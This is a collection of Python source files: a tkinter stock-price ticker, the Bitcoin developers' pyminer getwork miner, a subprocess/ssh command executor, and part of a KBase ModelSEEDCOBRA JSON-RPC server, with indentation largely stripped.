cls._instance = super(StocksInfoFetcher, cls).__new__(cls, *args, **kwargs)
return cls._instance
# initialize the class
def __init__(self):
self.mConfig = self.getConfiguration()
# read the configuration file
def getConfiguration(self):
with open(mConfFile) as configFile:
config = json.load(configFile)
return config[mConfSection]
# get http response
def getHttpResponse(self, url):
content = ""
try:
response = urlopen(url)
content = response.read().decode('gb2312')
except:
pass
return str(content)
# fetch the stocks info
def getStocksInfo(self):
# the configuration is none
if not self.mConfig:
return
stocks = []
for index in range(len(self.mConfig)):
stocks.append(str(self.mConfig[index]['code']))
stockCodeNames = ','.join(stocks)
# print("Stocks: {}".format(stockCodeNames))
url = mRemoteStockUrl + stockCodeNames
# print("url: {}".format(url))
httpContent = self.getHttpResponse(url)
print("httpContent: {}".format(httpContent))
stocksInfoResp = httpContent.split(';')
# print(stocksInfoResp[1])
stocksInfoList = []
costIndex = 0
for stock in stocksInfoResp:
line = stock[4:-1]
kvlist = line.split('=')
if len(kvlist) < 2:
continue
# print(kvlist)
code = kvlist[0].split('_')[-1]
dataline = kvlist[1]
datalist = dataline.split(',')
# check whether the market is closed or not
            if len(datalist) > 31 and datalist[31]:
                time = datetime.datetime.strptime(datalist[31], '%H:%M:%S').time()
                self.checkIsMarketClosed(time)
name = datalist[0][1:100]
lastclose = datalist[2]
current = datalist[3]
            # compare prices numerically; the raw fields are strings
            if float(current) > float(lastclose):
                direction = mCharUp
                styleTag = mUpTag
            elif float(current) == float(lastclose):
                direction = mCharEven
                styleTag = mEvenTag
            else:
                direction = mCharDown
                styleTag = mDownTag
percent = "{:.2f}".format((float(current) - float(lastclose)) / float(lastclose) * 100)
profit = 0
profitSign = mCharDraw
            cost, takeprofit, stoploss = self.getOneStockMetrics(code)
if (cost != 0):
profit = "{:.2f}".format((float(current) - float(cost)) / float(cost) * 100)
if (float(profit) > takeprofit):
profitSign = mCharWinAlert
elif (float(profit) > 0.00):
profitSign = mCharWin
elif (float(profit) == 0.00):
profitSign = mCharDraw
elif (float(profit) < stoploss):
profitSign = mCharLoseAlert
else:
profitSign = mCharLose
oneStockContent = " | {} {} {}({}%) {}({}%) ".format(name, current, direction, percent, profitSign, profit)
#oneStockContent = " |{} {}%".format(name, percent)
stocksInfoList.append({'code': code, 'tag': styleTag, 'content': oneStockContent})
costIndex += 1
return stocksInfoList
    def getOneStockMetrics(self, code):
        for stock in self.mConfig:
            if stock.get('code') == code:
                return stock.get('cost'), stock.get('takeprofit') * 100, stock.get('stoploss') * 100
        # fall back to neutral metrics when the code is not in the config
        return 0, 0, 0
    def checkIsMarketClosed(self, time):
        # without the global declaration the assignments below would only
        # create a local variable and never update the module-level flag
        global mIsMarketClosed
        if time < datetime.datetime.strptime('09:29:59', '%H:%M:%S').time() \
                or (time > datetime.datetime.strptime('11:31:00', '%H:%M:%S').time() \
                and time < datetime.datetime.strptime('12:59:59', '%H:%M:%S').time()) \
                or time > datetime.datetime.strptime('15:01:00', '%H:%M:%S').time():
            mIsMarketClosed = True
        else:
            mIsMarketClosed = False
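
# A minimal, standalone sketch of how one line of the Sina "hq" response is
# taken apart in getStocksInfo() above. The helper name is an illustrative
# assumption; the field indexes (0 name, 2 last close, 3 current price,
# 31 quote time) follow the parsing done in that method.
def parse_sina_quote_line(line):
    """Parse one 'var hq_str_<code>="..."' line into a small dict, or None."""
    kvlist = line.strip().rstrip(';')[4:].split('=')
    if len(kvlist) < 2:
        return None
    code = kvlist[0].split('_')[-1]
    datalist = kvlist[1].strip('"').split(',')
    if len(datalist) < 32:
        return None
    return {
        'code': code,
        'name': datalist[0],
        'lastclose': float(datalist[2]),
        'current': float(datalist[3]),
        'time': datalist[31],
    }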
class StocksController():
"""
Class StocksController, control the stock display
the scroll ticker
"""
# define the static variable
stockindex = 0
mStocks = []
mCodes = []
mContentLength = 0
mCurrentTicker = ''
def __init__(self):
self.loadMarket()
# the char index of one stock
self.index = 0
self.getStockCodes()
self.getContentLength()
def loadMarket(self):
# get the list of stocks [(code, tag, stock string),]
        stocksInfoFetcher = StocksInfoFetcher()
        StocksController.mStocks = stocksInfoFetcher.getStocksInfo()
def getStockCodes(self):
# fill the code, use as tag later
for stock in StocksController.mStocks:
code = stock.get('code')
if code not in StocksController.mCodes:
StocksController.mCodes.append(code)
def getContentLength(self):
contentLen = 0
for stock in StocksController.mStocks:
contentLen += len(stock.get('content'))
StocksController.mContentLength = contentLen
def getOneTicker(self):
self.mOneTicker = StocksController.mStocks[self.stockindex]
self.index = 0
if StocksController.stockindex + 1 == len(StocksController.mStocks):
StocksController.stockindex = 0
else:
StocksController.stockindex += 1
return self.mOneTicker.get('content')
def getNextCharacter(self):
if self.index == len(StocksController.mCurrentTicker):
StocksController.mCurrentTicker = self.getOneTicker()
self.index = 0
self.mCharacterSymbol = StocksController.mCurrentTicker[self.index:self.index + 1]
self.index += 1
return self.mCharacterSymbol
def getTag(self):
return self.mOneTicker.get('tag')
def getCode(self):
return self.mOneTicker.get('code')
class UpdateThread(threading.Thread):
"""
Class UpdateThread, subclass of Thread, handle the time to the next update of the stocks values
"""
def __init__(self):
self.mStocksController = StocksController()
threading.Thread.__init__(self)
    def run(self):
        # loop instead of recursively calling run(); the original tail call
        # would eventually hit the recursion limit
        while True:
            time.sleep(mUpdateInterval)
            self.mStocksController.loadMarket()
class DisplayStockGUI(Frame):
"""
Class of tkinter.Frame subclass, Initializes the GUI
"""
def __init__(self, parent):
# use this flag to refresh the message
self.mMsgDispCount = 0
self.mMsgSize = 0
self.mFinalMsg = ''
Frame.__init__(self, parent)
self.parent = parent
# tags by code name
        # creates an instance of the StocksController class that holds the data
self.mStocksController = StocksController()
self.mCodes = self.mStocksController.mCodes
self.mPopupWin = False
self.mCurrentCode = ''
self.mCurrentImg = ''
self.mContentOffset = 0
self.mContentWidth = 0
self.initGUI()
self.scrollMsg()
# start the auto update threading
self.thread_updating = UpdateThread()
self.thread_updating.daemon = True
self.thread_updating.start()
def initGUI(self):
# changes the window icon
#self.parent.iconbitmap(mWinIcon)
self.parent.title(mWinTitle)
# content LabelFrame to show the ticker scrolling line of text
self.lblfr_1 = LabelFrame(self.parent)
self.lblfr_1.pack()
# Creates a bold font
self.bold_font = Font(family="Consolas", size=11)
# the scrolling line of Text for show the data
self.txt_ticker_widget = Text(self.lblfr_1, background='black', height=2, width=mWinWidth, wrap="none")
self.txt_ticker_widget.pack(side=TOP, fill=X, expand=True)
self.txt_ticker_widget.tag_configure(mUpTag, foreground="red", font=self.bold_font)
self.txt_ticker_widget.tag_configure(mDownTag, foreground="green", font=self.bold_font)
self.txt_ticker_widget.tag_configure(mEvenTag, foreground="white", font=self.bold_font)
# self.txt_ticker_widget.tag_configure('sh000001', background="yellow")
# self.txt_ticker_widget.tag_configure('sz002229', background="blue")
# self.txt_ticker_widget.tag_configure('sh600030', background="white")
self.txt_ticker_widget.bind("<Enter>", self.onMouseEnter)
self.txt_ticker_widget.bind('<Motion>', self.onMouseMove)
self.txt_ticker_widget.bind("<Leave>", self.onMouseLeave)
def onMouseMove(self, event):
code = self.getCodeOnMouseOver(event)
self.popUpStocksDetailedInfo(code)
def onMouseEnter(self, event):
global mOnMouseEnter
mOnMouseEnter = True
def onMouseLeave(self, event):
global mOnMouseEnter
mOnMouseEnter = False
self.hidePopupWin()
def hidePopupWin(self):
if self.mPopupWin:
self.mPopupWin.destroy()
self.mPopupWin = False
def scrollMsg(self):
global mOnMouseEnter
if not mOnMouseEnter:
self.txt_ticker_widget.configure(state=NORMAL)
# if we are at the begin of the loop, we should clear the text
#if self.mContentOffset > self.mStocksController.mContentLength:
# self.txt_ticker_widget.delete(1.0)
#print(self.mStocksController.getNextCharacter())
#self.txt_ticker_widget.insert(END, self.mStocksController.getNextCharacter(),\
# (self.mStocksController.getTag(),self.mStocksController.getCode()))
#self.txt_ticker_widget.see(END)
self.txt_ticker_widget.delete(1.0,END)
try:
self.txt_ticker_widget.insert(INSERT, self.mStocksController.getOneTicker(),\
(self.mStocksController.getTag(),self.mStocksController.getCode()))
except:
pass
self.txt_ticker_widget.see(END)
#self.mContentWidth = self.bold_font.measure(self.txt_ticker_widget.get("1.0", "end-1c"))
# print(self.mContentWidth)
# print(self.txt_ticker_widget.get("1.0", "end-1c"))
#self.mContentOffset += 1
self.txt_ticker_widget.configure(state=DISABLED)
self.txt_ticker_widget.after(mCharRefreshSpeed, self.scrollMsg)
def getCodeOnMouseOver(self, event):
# the index position of the total content
mousePos = event.widget.index("@%s,%s" % (event.x, event.y))
tmpCodes = self.getCodesFromTags(event)
for code in tmpCodes:
code['irange'] = list(event.widget.tag_ranges(code['code']))
# iterate them pairwise (start and end index)
for start, end in zip(code['irange'][0::2], code['irange'][1::2]):
# check if the tag matches the mouse click index
if event.widget.compare(start, '<=', mousePos) and event.widget.compare(mousePos, '<', end):
return code.get('code')
def getCodesFromTags(self, event):
tmpCodes = []
for tag in (event.widget.tag_names() and self.mCodes):
code = tag
tmpCodes.append({'code': code, 'irange': []})
return tmpCodes
    def getRemotePicture(self, url):
fd = urlopen(url)
imageFile = io.BytesIO(fd.read())
fd.close()
return imageFile
def popUpStocksDetailedInfo(self, code):
if not code:
return
x = self.parent.winfo_rootx() - mPopWinLeftShift
y = self.parent.winfo_rooty() - mPopWinUpShift
ystr = "+{}".format(y)
if y < 0:
ystr = "+{}".format(self.parent.winfo_rooty() + 35)
if self.mPopupWin and code != self.mCurrentCode:
            self.hidePopupWin()
if not self.mPopupWin:
x = self.parent.winfo_rootx() - mPopWinLeftShift
y = self.parent.winfo_rooty() - mPopWinUpShift
ystr = "+{}".format(y)
if y < 0:
ystr = "+{}".format(self.parent.winfo_rooty() + 35)
# creates a toplevel window
self.mPopupWin = Toplevel(self.parent)
# # Leaves only the label and removes the app window
self.mPopupWin.wm_overrideredirect(True)
self.mPopupWin.wm_geometry("{}x{}+{}{}".format(mPopWinWidth,mPopWinHeight, x, ystr))
# url = 'http://image.sinajs.cn/newchart/min/n/sh000001.gif'
# if (code != self.mCurrentCode or not self.mCurrentImg):
url = mRemoteStockImgUrl.format(code)
            self.mCurrentImg = self.getRemotePicture(url)
self.mCurrentCode = code
origImgData = Image.open(self.mCurrentImg)
finalImage = ImageTk.PhotoImage(origImgData) # Keep a reference, prevent GC
Label(self.mPopupWin, image=finalImage).pack()
self.mPopupWin.mainloop()
root = Tk()
root.geometry('{}x{}-{}-{}'.format(mWinWidth, mMainWinHeight, mMainWinBottomLeftShift, mMainWinBottomUpShift))
root.attributes('-alpha', 0.8)
# border less
root.overrideredirect(1)
# top of all others windows
root.wm_attributes("-topmost", True)
# root.attributes("-toolwindow", 1)
root.resizable(0, 0)
# root.lift()
# make the window to stay above all other windows
DisplayStockGUI(root)
# hide
def autoHide():
while True:
localtime = time.localtime(time.time())
if localtime.tm_hour >= 9 and localtime.tm_hour < 15 :
root.deiconify()
else:
root.withdraw()
time.sleep(10)
t = threading.Thread(target=autoHide, daemon=True)
t.start()
root.mainloop()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
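
# A standalone sketch of the proof-of-work test performed in Miner.work()
# above: double SHA-256 over the 80-byte block header, then compare the
# byte-reversed digest, read as an integer, against the target. The helper
# name is illustrative; header_hex and target_hex are caller-supplied hex
# strings.
def check_proof_of_work(header_hex, target_hex):
    import binascii
    header = binascii.unhexlify(header_hex)            # 80-byte block header
    digest = hashlib.sha256(hashlib.sha256(header).digest()).digest()
    # Bitcoin compares the hash as a little-endian 256-bit integer, so the
    # digest bytes are reversed before conversion.
    value = int(binascii.hexlify(digest[::-1]), 16)
    return value < int(target_hex, 16)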
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 26966
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
process.py
|
import os
import json
import logging
import subprocess
import time
from multiprocessing import Process, Queue
logger = logging.getLogger(__name__)
class Loader:
def __init__(self):
self._files = []
self._classes = {}
self._modules = []
def get_modules(self):
return self._modules
def get_classes(self):
return self._classes
def get_files(self):
return self._files
def loading(self, root, file, full_path):
p = os.path.join(root, file)
if full_path:
file_path = os.path.abspath(p)
self._files.append(file_path)
else:
self._files.append(file)
def load_files(self, folder, file_begin_with, endswith=None, full_path=False):
for root, dirs, files in os.walk(folder):
for file in files:
if file.startswith(file_begin_with):
if endswith:
if file.endswith(endswith):
self.loading(root, file, full_path)
else:
self.loading(root, file, full_path)
break
return self._files
def load_classes(self, folder, file_begin_with, class_begin_with):
files = self.load_files(folder, file_begin_with)
files = [f.split('.')[0] for f in files if f.endswith('.py')]
self._modules = [__import__(f) for f in files]
for m in self._modules:
classes = [c for c in dir(m) if c.startswith(class_begin_with)]
if classes:
for c in classes:
self._classes[c] = getattr(m, c)
return self._classes
class Processor:
def __init__(self):
self.process = None
def start_process(self, args, queue, stop=False, timeout=60):
return_code = 0
out, err = '', None
try:
p = subprocess.Popen(args,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
)
self.process = p
logger.debug('process started %s', p.pid)
if stop:
if self.stop_process(timeout):
out, err = p.communicate()
return_code = p.returncode
else:
return_code = -1
err = 'ERROR: Process not defined'
else:
logger.debug('process communicate %s', p.pid)
out, err = p.communicate()
return_code = p.returncode
except OSError:
return_code = -1
err = 'ERROR: exception OSError'
        finally:
            # the local 'p' is undefined if Popen itself raised, so log via
            # the instance attribute instead
            logger.debug('process finished %s', self.process.pid if self.process else None)
if return_code != 0:
queue_answer = err
logger.error(err)
else:
queue_answer = out
self.process = None
queue.put(return_code)
queue.put(queue_answer)
queue.put('STOP')
queue.close()
return return_code
def stop_process(self, timeout):
logger.debug('stopping process %s after %s', self.process.pid, timeout)
if self.process:
time.sleep(timeout)
self.process.kill()
logger.debug('Timeout for pid %s', self.process.pid)
self.process = None
return True
return False
class Multiprocessor:
def __init__(self):
self.processes = {}
self.processor = Processor()
def make_process(self, cmd, stop, timeout):
q = Queue()
p = Process(target=self.processor.start_process, args=(cmd, q, stop, timeout))
return (p,q)
def start_processes(self, cmds, stop, timeout):
self.processes = {}
for _id,cmd in cmds.items():
self.processes[_id] = self.make_process(cmd, stop, timeout)
logger.debug('Starting processes %s', self.processes)
for (p,q) in self.processes.values():
p.start()
def check_processes(self):
logger.debug("checking processes")
any_alive = True
while any_alive:
any_alive = any([p.is_alive() for (p,q) in self.processes.values()])
all_queued = all([not q.empty() for (p, q) in self.processes.values()])
time.sleep(0.05)
if all_queued and any_alive:
break
return True
def dump_queues(self, queue):
return_code = queue.get_nowait()
result = ""
for i in iter(queue.get_nowait, 'STOP'):
if type(i) is bytes:
i_dec = i.decode("utf-8")
else:
i_dec = i
result += i_dec
return return_code,result
def get_processes_queue(self):
outs = {}
for _id, (p, q) in self.processes.items():
try:
exitcode, _res = self.dump_queues(q)
except Exception as e:
logger.debug("Process id %s dump queue exception %s", _id, e)
else:
p.terminate()
outs[_id] = (exitcode, _res)
return outs
def run(self, cmds, stop=False, timeout=60):
self.start_processes(cmds, stop, timeout)
_outputs = {}
if self.check_processes():
_outputs = self.get_processes_queue()
return _outputs
class Executor:
def __init__(self):
self._multi_processor = Multiprocessor()
self._exe = {'py': '/usr/bin/python3',
'sh': 'sh',
'pl': 'perl',
'java': 'java'}
def _parse_cmd(self, cmd):
if type(cmd) is list:
cmd = [str(c) for c in cmd]
else:
cmd = cmd.split(' ')
return cmd
def _parse_type(self, cmd):
type = 'sh'
_cmd = self._parse_cmd(cmd)
_cmd = _cmd[0]
if len(_cmd.split('.')) > 1:
if _cmd.split('.')[-1] in self._exe:
type = self._exe[_cmd.split('.')[-1]]
else:
type = None
else:
type = None
return type
def _cmd_exec_local(self, cmd):
# logger.debug('_exec_local')
_type = self._parse_type(cmd)
if type(cmd) is list:
cmd = [str(c) for c in cmd]
cmd = ' '.join(cmd)
if _type:
cmd = _type + ' ' + cmd
cmd = self._parse_cmd(cmd)
logger.debug(cmd)
return cmd
def _cmd_exec_remote(self, cmd, host, user):
# logger.debug('_exec_remote')
ssh = ''.join(['ssh ', user, '@', host])
_type = self._parse_type(cmd)
if type(cmd) is list:
cmd = [str(c) for c in cmd]
cmd = ' '.join(cmd)
if _type:
            cmd = ssh + ' ' + _type + ' < ' + cmd
else:
cmd = ssh + ' ' + cmd
cmd = self._parse_cmd(cmd)
logger.debug(cmd)
return cmd
def _output(self, ret, out):
if ret == 0:
return 'ok',out
else:
return None,out
def _build_cmd(self, cmds, remote=False, host=None, user=None):
built_cmds = {}
for _id, cmd in cmds.items():
if remote and host and user:
_cmd = self._cmd_exec_remote(cmd, host, user)
else:
_cmd = self._cmd_exec_local(cmd)
built_cmds[_id] = _cmd
return built_cmds
def _parse_outputs(self, outputs):
parsed_outs = {}
for _id,output in outputs.items():
(ret, out) = output
# logger.debug('ret %s, output %s', ret, out)
parsed_outs[_id] = self._output(ret, out)
return parsed_outs
def run(self, cmds, **kwargs):
stop = False
timeout = 0
remote = False
host = None
user = None
if 'stop' in kwargs:
stop = kwargs['stop']
if 'timeout' in kwargs:
timeout = kwargs['timeout']
if 'remote' in kwargs:
remote = kwargs['remote']
if 'host' in kwargs and 'user' in kwargs:
host = kwargs['host']
user = kwargs['user']
else:
logger.debug("No user or host provided for remote exec")
                raise ValueError("remote execution requires 'host' and 'user' keyword arguments")
_built_cmds = self._build_cmd(cmds, remote=remote, host=host, user=user)
_outputs = self._multi_processor.run(_built_cmds, stop, timeout)
_outs = self._parse_outputs(_outputs)
return _outs
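
# A minimal sketch of how Executor.run() above is driven. The command ids,
# the echo commands and the remote host/user values are illustrative
# assumptions; the function is defined purely as an example and is not
# called by this module.
def _example_executor_usage():
    executor = Executor()
    # Local execution: each value may be a command string or a list of args.
    outputs = executor.run({1: 'echo hello', 2: ['echo', 'world']})
    # Each id maps to ('ok', stdout) on success or (None, stderr) on failure.
    for _id, (ack, out) in outputs.items():
        print(_id, ack, out)
    # Remote execution wraps the command in ssh and needs host and user:
    # executor.run({3: 'uptime'}, remote=True, host='198.51.100.7', user='operator')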
class Actuator(Executor):
def __init__(self):
Executor.__init__(self)
self.stimulus = {}
self.evals = {}
self.acts = {}
self._cfg = None
self._loader = Loader()
def get_acts(self):
return self.acts
def cfg(self, cfg):
self._cfg = cfg
self._load_acts()
def _load_acts(self):
files = self._loader.load_files(
self._cfg.get("folder"),
self._cfg.get("prefix"),
self._cfg.get("suffix"),
self._cfg.get("full_path")
)
for file in files:
cmd = {1:[file, '--info']}
output = self.run(cmd)
for _, (ack, out) in output.items():
if ack:
act_info = json.loads(out)
if act_info.get('id', None):
act_info['file'] = file
self.acts[act_info['id']] = act_info
else:
logger.debug("Could not load act %s", cmd)
def _parse_act_args(self, stimulus, act):
stimulus_args = stimulus.get('parameters')
args = []
for k,v in stimulus_args.items():
if v and str(v) != 'None':
arg = '--'+k
args.append(arg)
args.append(v)
return args
def _parse_act_cmd(self, stimulus):
act_cmd = None
if stimulus['id'] in self.acts:
act = self.acts[stimulus['id']]
args = self._parse_act_args(stimulus, act)
act_cmd = [act['file']]
act_cmd.extend(args)
return act_cmd
def _load_instruction(self, inst):
actions = inst.get('actions')
for _,action in actions.items():
self.stimulus[action.get('id')] = action.get('stimulus')
def _exec_stimulus(self):
self.evals = {}
act_cmds = {}
for _id,stimulus in self.stimulus.items():
act_cmds[_id] = self._parse_act_cmd(stimulus)
if act_cmds:
outputs = self.run(act_cmds)
self._check_outputs(outputs)
def _check_outputs(self, outputs):
for _id, output in outputs.items():
ack, out = output
stm = self.stimulus[_id]
runner_id = stm.get('id')
if ack:
self.evals[_id] = (True, runner_id, json.loads(out))
else:
self.evals[_id] = (False, runner_id, out)
def act(self, instruction):
self.stimulus = {}
self._load_instruction(instruction)
self._exec_stimulus()
return self.evals
|
ModelSEEDCOBRAServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from ModelSEEDCOBRA.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'ModelSEEDCOBRA'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from ModelSEEDCOBRA.ModelSEEDCOBRAImpl import ModelSEEDCOBRA # noqa @IgnorePep8
impl_ModelSEEDCOBRA = ModelSEEDCOBRA(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
